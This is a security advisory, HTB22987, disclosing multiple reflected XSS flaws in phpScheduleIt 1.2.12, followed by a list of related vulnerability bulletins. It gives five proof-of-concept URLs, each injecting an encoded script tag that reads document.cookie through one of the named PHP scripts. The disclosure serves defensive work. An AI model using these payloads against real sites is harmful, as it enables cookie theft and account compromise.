HTB22987: Multiple XSS in phpScheduleIt



Vulnerability ID: HTB22987
Reference: http://www.htbridge.ch/advisory/multiple_xss_in_phpscheduleit.html
Product: phpScheduleIt
Vendor: php.brickhost.com
Vulnerable Version: 1.2.12
Vendor Notification: 05 May 2011
Vulnerability Type: XSS (Cross Site Scripting)
Risk level: Medium
Credit: High-Tech Bridge SA Security Research Lab ( http://www.htbridge.ch/advisory/ )

Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.
The vulnerability exists due to failure in the "forgot_pwd.php" script to properly sanitize user-supplied input.
Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based auwhentication credentials, disclosure or modification of sensitive data.
The following PoC is available:

http://[host]/forgot_pwd.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

The vulnerability exists due to failure in the "index.php" script to properly sanitize user-supplied input.
The following PoC is available:

http://[host]/index.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

The vulnerability exists due to failure in the "register.php" script to properly sanitize user-supplied input.
The following PoC is available:

http://[host]/register.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

The vulnerability exists due to failure in the "roschedule.php" script to properly sanitize user-supplied input.
The following PoC is available:

http://[host]/roschedule.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

The vulnerability exists due to failure in the "popCalendar.php" script to properly sanitize user-supplied input in "scheduleid" variable.
The following PoC is available:

http://[host]/popCalendar.php?scheduleid=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E



Relevant Pages

  • SecurityFocus Microsoft Newsletter #83
    ... MICROSOFT VULNERABILITY SUMMARY ... Microsoft IIS CodeBrws.ASP Source Code Disclosure Vulnerability ... Microsoft Internet Explorer History List Script Injection ... Microsoft Windows 2000 Lanman Denial of Service Vulnerability ...
    (Focus-Microsoft)
  • SecurityFocus Microsoft Newsletter #84
    ... The most critical piece of vulnerability assessment is remediation. ... MICROSOFT VULNERABILITY SUMMARY ... IcrediBB Script Injection Vulnerability ... WorkforceROI XPede Unprotected Administrative Facilities... ...
    (Focus-Microsoft)
  • SecurityFocus Microsoft Newsletter #91
    ... SecurityFocus Microsoft Newsletter #91 ... Multiple Bugzilla Security Vulnerabilities ... Geeklog pid CGI Variable SQL Injection Vulnerability ... Geeklog Calendar Event Form Script Injection Vulnerability ...
    (Focus-Microsoft)
  • SecurityFocus Microsoft Newsletter #109
    ... MICROSOFT VULNERABILITY SUMMARY ... PHPRank Banner Script Code Injection Vulnerability ... PHPNuke Multiple Script Code Filtering Vulnerabilities ...
    (Focus-Microsoft)
  • HP Web JetAdmin vulnerabilities.
    ... this vulnerability is not a critical risk. ... Luckily these directories do not have execute permissions but, this script, ... create files in the Administrators startup folder. ... it may be possible to directly inject the hts scripting ...
    (Bugtraq)